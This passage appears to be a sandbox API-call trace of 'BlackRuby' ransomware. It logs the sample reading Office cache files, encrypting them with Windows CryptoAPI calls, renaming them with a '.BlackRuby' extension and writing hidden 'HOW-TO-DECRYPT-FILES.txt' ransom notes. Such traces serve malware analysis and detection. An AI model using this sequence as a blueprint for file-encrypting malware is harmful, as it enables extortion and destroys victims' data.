"c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b45838 | out: lpFileInformation=0x1b45838*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c968f90, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c968f90, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0x910823d0, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x43c8)) returned 1 [0047.705] GetLastError () returned 0x5 [0047.705] SetErrorMode (uMode=0x0) returned 0x1 [0047.705] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.705] GetLastError () returned 0x5 [0047.705] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.705] GetLastError () returned 0x5 [0047.705] SetErrorMode (uMode=0x1) returned 0x0 [0047.705] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.705] GetLastError () returned 0x0 [0047.705] GetFileType (hFile=0x184) returned 0x1 [0047.705] SetErrorMode (uMode=0x0) returned 0x1 [0047.705] GetFileType (hFile=0x184) returned 0x1 [0047.705] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x43c8 [0047.705] GetLastError () returned 0x0 [0047.705] ReadFile (in: hFile=0x184, lpBuffer=0x1b47738, nNumberOfBytesToRead=0x43c8, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b47738*, lpNumberOfBytesRead=0x18ed84*=0x43c8, lpOverlapped=0x0) returned 1 [0047.715] GetLastError () returned 0x0 [0047.715] CloseHandle (hObject=0x184) returned 1 [0047.715] GetLastError () returned 0x0 [0047.715] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.715] GetLastError () returned 0x0 [0047.715] SetErrorMode (uMode=0x1) returned 0x0 [0047.715] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c968f90, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c968f90, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0x910823d0, ftLastWriteTime.dwHighDateTime=0x1d3022d, nFileSizeHigh=0x0, nFileSizeLow=0x43c8)) returned 1 [0047.716] GetLastError () returned 0x0 [0047.716] SetErrorMode (uMode=0x0) returned 0x1 [0047.716] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0047.716] GetLastError () returned 0x0 [0047.749] CryptImportKey (in: hProv=0x37c790, pbData=0x1baa2a0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360fa0) returned 1 [0047.749] GetLastError () returned 0x0 [0047.749] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.749] GetLastError () returned 0x0 [0047.754] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.754] GetLastError () returned 0x0 [0047.755] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b20) returned 1 [0047.755] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.755] GetLastError () returned 0x0 [0047.755] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1bd72ec*=0x1, dwFlags=0x0) returned 1 [0047.755] GetLastError () returned 0x0 [0047.755] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1bd72b8, dwFlags=0x0) returned 1 [0047.755] GetLastError () returned 0x0 [0047.755] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd7334*, pdwDataLen=0x18ed74*=0x44c0, dwBufLen=0x44c0 | out: pbData=0x1bd7334*, pdwDataLen=0x18ed74*=0x44c0) returned 1 [0047.755] GetLastError () returned 0x0 [0047.755] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bdfce0*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bdfce0*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0047.755] GetLastError () returned 0x0 [0047.755] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bdfd10*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bdfd10*, pdwDataLen=0x18ed94*=0x10) returned 1 [0047.755] GetLastError () returned 0x0 [0047.755] CryptDestroyKey (hKey=0x360fa0) returned 1 [0047.755] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.755] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.755] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.755] GetLastError () returned 0x0 [0047.755] SetErrorMode (uMode=0x1) returned 0x0 [0047.755] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.756] GetLastError () returned 0xb7 [0047.756] GetFileType (hFile=0x184) returned 0x1 [0047.756] SetErrorMode (uMode=0x0) returned 0x1 [0047.756] GetFileType (hFile=0x184) returned 0x1 [0047.758] CloseHandle (hObject=0x184) returned 1 [0047.758] GetLastError () returned 0xb7 [0047.758] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.758] GetLastError () returned 0xb7 [0047.758] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Encrypted_qoazyVsTar6edFzqbTSC52q7FnF3ZQJUo4vIgWB0O.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Encrypted_qoazyVsTar6edFzqbTSC52q7FnF3ZQJUo4vIgWB0O.BlackRuby", lpFilePart=0x0) returned 0x7c [0047.758] GetLastError () returned 0xb7 [0047.758] SetErrorMode (uMode=0x1) returned 0x0 [0047.758] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c968f90, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c968f90, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0x24abe3a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x44d0)) returned 1 [0047.758] GetLastError () returned 0xb7 [0047.758] SetErrorMode (uMode=0x0) returned 0x1 [0047.758] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\Encrypted_qoazyVsTar6edFzqbTSC52q7FnF3ZQJUo4vIgWB0O.BlackRuby" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\encrypted_qoazyvstar6edfzqbtsc52q7fnf3zqjuo4vigwb0o.blackruby")) returned 1 [0047.759] GetLastError () returned 0xb7 [0047.759] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.759] GetLastError () returned 0xb7 [0047.759] SetErrorMode (uMode=0x1) returned 0x0 [0047.759] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.759] GetLastError () returned 0x5 [0047.760] SetErrorMode (uMode=0x0) returned 0x1 [0047.760] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0047.760] GetLastError () returned 0x5 [0047.760] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.760] GetLastError () returned 0x5 [0047.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.760] GetLastError () returned 0x5 [0047.760] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0047.760] GetLastError () returned 0x5 [0047.760] SetErrorMode (uMode=0x1) returned 0x0 [0047.760] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360fa0 [0047.769] GetLastError () returned 0x5 [0047.769] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.769] GetLastError () returned 0x5 [0047.769] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.769] GetLastError () returned 0x5 [0047.769] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.769] GetLastError () returned 0x5 [0047.769] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.769] GetLastError () returned 0x5 [0047.769] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.769] GetLastError () returned 0x5 [0047.769] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.769] GetLastError () returned 0x5 [0047.769] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.769] GetLastError () returned 0x5 [0047.769] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.769] GetLastError () returned 0x5 [0047.770] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.770] GetLastError () returned 0x5 [0047.770] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.770] GetLastError () returned 0x5 [0047.770] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.770] GetLastError () returned 0x5 [0047.770] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.770] GetLastError () returned 0x5 [0047.770] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.770] GetLastError () returned 0x5 [0047.770] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.770] GetLastError () returned 0x12 [0047.770] FindClose (in: hFindFile=0x360fa0 | out: hFindFile=0x360fa0) returned 1 [0047.770] SetErrorMode (uMode=0x0) returned 0x1 [0047.771] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0047.771] GetLastError () returned 0x12 [0047.771] SetErrorMode (uMode=0x1) returned 0x0 [0047.771] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360fa0 [0047.771] GetLastError () returned 0x12 [0047.771] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.771] GetLastError () returned 0x12 [0047.771] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.771] GetLastError () returned 0x12 [0047.772] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.772] GetLastError () returned 0x12 [0047.772] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.772] GetLastError () returned 0x12 [0047.772] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.772] GetLastError () returned 0x12 [0047.772] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.772] GetLastError () returned 0x12 [0047.772] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.772] GetLastError () returned 0x12 [0047.772] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.772] GetLastError () returned 0x12 [0047.772] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.772] GetLastError () returned 0x12 [0047.772] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.772] GetLastError () returned 0x12 [0047.772] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.772] GetLastError () returned 0x12 [0047.772] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.772] GetLastError () returned 0x12 [0047.772] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.772] GetLastError () returned 0x12 [0047.772] FindNextFileW (in: hFindFile=0x360fa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.772] GetLastError () returned 0x12 [0047.772] FindClose (in: hFindFile=0x360fa0 | out: hFindFile=0x360fa0) returned 1 [0047.773] SetErrorMode (uMode=0x0) returned 0x1 [0047.773] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.msi", lpFilePart=0x0) returned 0x4d [0047.773] GetLastError () returned 0x12 [0047.773] SetErrorMode (uMode=0x1) returned 0x0 [0047.773] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\office64ww.msi"), fInfoLevelId=0x0, lpFileInformation=0x1c0c4ec | out: lpFileInformation=0x1c0c4ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdcc030e0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xdcc030e0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x9d9c1310, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x2e2a00)) returned 1 [0047.774] GetLastError () returned 0x12 [0047.774] SetErrorMode (uMode=0x0) returned 0x1 [0047.775] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.775] GetLastError () returned 0x12 [0047.775] SetErrorMode (uMode=0x1) returned 0x0 [0047.775] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.775] GetLastError () returned 0x0 [0047.775] GetFileType (hFile=0x184) returned 0x1 [0047.775] SetErrorMode (uMode=0x0) returned 0x1 [0047.775] GetFileType (hFile=0x184) returned 0x1 [0047.775] WriteFile (in: hFile=0x184, lpBuffer=0x1c27fd0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1c27fd0*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0047.776] GetLastError () returned 0x0 [0047.776] CloseHandle (hObject=0x184) returned 1 [0047.777] GetLastError () returned 0x0 [0047.777] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.777] GetLastError () returned 0x0 [0047.777] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0047.777] GetLastError () returned 0x0 [0047.777] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.777] GetLastError () returned 0x0 [0047.777] SetErrorMode (uMode=0x1) returned 0x0 [0047.777] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\office64ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c29cdc | out: lpFileInformation=0x1c29cdc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf13501e0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xf13501e0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x9d94e720, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x124d)) returned 1 [0047.777] GetLastError () returned 0x0 [0047.777] SetErrorMode (uMode=0x0) returned 0x1 [0047.777] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.777] GetLastError () returned 0x0 [0047.777] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.777] GetLastError () returned 0x0 [0047.777] SetErrorMode (uMode=0x1) returned 0x0 [0047.777] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\office64ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.777] GetLastError () returned 0x0 [0047.778] GetFileType (hFile=0x184) returned 0x1 [0047.778] SetErrorMode (uMode=0x0) returned 0x1 [0047.778] GetFileType (hFile=0x184) returned 0x1 [0047.778] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x124d [0047.778] GetLastError () returned 0x0 [0047.778] ReadFile (in: hFile=0x184, lpBuffer=0x1c2b918, nNumberOfBytesToRead=0x124d, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c2b918*, lpNumberOfBytesRead=0x18ed84*=0x124d, lpOverlapped=0x0) returned 1 [0047.783] GetLastError () returned 0x0 [0047.784] CloseHandle (hObject=0x184) returned 1 [0047.784] GetLastError () returned 0x0 [0047.784] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.784] GetLastError () returned 0x0 [0047.784] SetErrorMode (uMode=0x1) returned 0x0 [0047.784] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\office64ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf13501e0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xf13501e0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x9d94e720, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x124d)) returned 1 [0047.784] GetLastError () returned 0x0 [0047.784] SetErrorMode (uMode=0x0) returned 0x1 [0047.784] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0047.784] GetLastError () returned 0x0 [0047.817] CryptImportKey (in: hProv=0x37c708, pbData=0x1c881a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360de0) returned 1 [0047.817] GetLastError () returned 0x0 [0047.817] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.817] GetLastError () returned 0x0 [0047.822] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.822] GetLastError () returned 0x0 [0047.822] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360da0) returned 1 [0047.822] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.823] GetLastError () returned 0x0 [0047.823] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1cb51f0*=0x1, dwFlags=0x0) returned 1 [0047.823] GetLastError () returned 0x0 [0047.823] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1cb51bc, dwFlags=0x0) returned 1 [0047.823] GetLastError () returned 0x0 [0047.823] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cb5238*, pdwDataLen=0x18ed74*=0x1340, dwBufLen=0x1340 | out: pbData=0x1cb5238*, pdwDataLen=0x18ed74*=0x1340) returned 1 [0047.823] GetLastError () returned 0x0 [0047.823] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cb78e4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cb78e4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0047.823] GetLastError () returned 0x0 [0047.823] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cb7914*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cb7914*, pdwDataLen=0x18ed94*=0x10) returned 1 [0047.823] GetLastError () returned 0x0 [0047.823] CryptDestroyKey (hKey=0x360de0) returned 1 [0047.823] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.823] CryptReleaseContext 